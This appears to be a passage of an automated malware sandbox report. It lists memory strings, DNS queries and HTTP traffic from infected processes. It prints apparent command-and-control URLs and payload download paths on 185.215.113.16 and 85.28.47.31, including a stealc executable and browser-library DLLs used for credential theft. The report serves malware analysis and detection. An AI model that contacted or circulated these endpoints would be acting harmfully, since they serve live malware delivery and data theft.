Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: phttps://www.youtube.com/account --attempting-deelevation( equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login equals www.youtube.com (Youtube)
Source: ee7a49fbf0.exe, 00000018.00000003.2729921737.0000000002517000.00000004.00000020.00020000.00000000.sdmp, ee7a49fbf0.exe, 00000018.00000003.2730073719.0000000002330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: utoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSER{8 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3075146956.0000016DDD469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3191939859.0000016DE9A24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/account equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: www.youtube.com\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: www.youtube.comaccounts.google.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: www.youtube.comaccounts.google.com/\| equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: www.youtube.comaccounts.google.comeD/ equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: www.youtube.comeD/ equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: www.youtube.comwww.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: www.youtube.comwww.youtube.com!) equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: www.youtube.comwww.youtube.com\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2866313930.0000016DDE1FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x-auto-login: realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xe=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: mitmdetection.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: o.pki.goog
Source: global traffic	DNS traffic detected: DNS query: pki-goog.l.google.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www3.l.google.com
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: r10.o.lencr.org
Source: global traffic	DNS traffic detected: DNS query: r3.o.lencr.org
Source: global traffic	DNS traffic detected: DNS query: getpocket.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.pocket.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: r11.o.lencr.org
Source: global traffic	DNS traffic detected: DNS query: firefox-api-proxy.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: tiles-cdn.prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: img-getpocket.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: img-prod.pocket.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: firefox-settings-attachments.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: attachments.prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.expedia.com
Source: global traffic	DNS traffic detected: DNS query: www.amazon.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: d3ag4hukkh62yn.cloudfront.net
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: getpocket.com
Source: global traffic	DNS traffic detected: DNS query: market-trk.com
Source: global traffic	DNS traffic detected: DNS query: www.mozorg.moz.works
Source: global traffic	DNS traffic detected: DNS query: www.romper.com
Source: global traffic	DNS traffic detected: DNS query: www.wired.com
Source: global traffic	DNS traffic detected: DNS query: www.themarshallproject.org
Source: global traffic	DNS traffic detected: DNS query: ww55.affinity.net
Source: global traffic	DNS traffic detected: DNS query: www.jezebel.com
Source: global traffic	DNS traffic detected: DNS query: eat.hungryroot.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com

Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/9
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.000000000076B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.00000000007AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php%
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php5=
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpG
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpK
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpc
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpk=U
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedb
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedk
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpx=$
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/cost/random.exe
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/cost/random.exe7
Source: file.exe, 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/enter.exen
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stealc/random.exe395d7f
Source: explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stealc/random.exe=
Source: explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stealc/random.exeR
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ws
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/0003002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/03002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/15.113.19/0003002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/15.113.19/002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/6122658-3693405117-2476756634-1003
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/G
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php003002
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0io
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1000003002F
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1000003002FK
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpEscape
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpI
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpPhO
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpPiO
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpart
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpcountPicturesg
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phph
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpq
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpr
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpr(
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phps
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phptch
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/ferences.SourceAumide
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/lfons
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/rosoft
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, 48f0ec6733.exe, 00000015.00000002.2790891985.00000000026EE000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.000000000274A000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.0000000002500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.000000000274A000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.0000000002500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/#
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002765000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.0000000002500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: file.exe, 00000000.00000002.2461529806.0000000028D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php(
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php)l
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.0000000002500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php1
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php6
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php=l
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpD
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpI
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpK
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpT
Source: file.exe, 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpcpoa
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpf
Source: file.exe, 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllm$
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dllH
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllA
Source: file.exe, 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/al
Source: file.exe, 00000000.00000002.2461529806.0000000028D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/e
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/k
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/kl
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/yl8(
Source: file.exe, 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 48f0ec6733.exe, 00000015.00000002.2790891985.00000000026EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31I
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31gl&(
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31o
Source: firefox.exe, 00000021.00000003.3218619086.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3199884339.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/wr2/GSyT1N4PBrg.crl0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
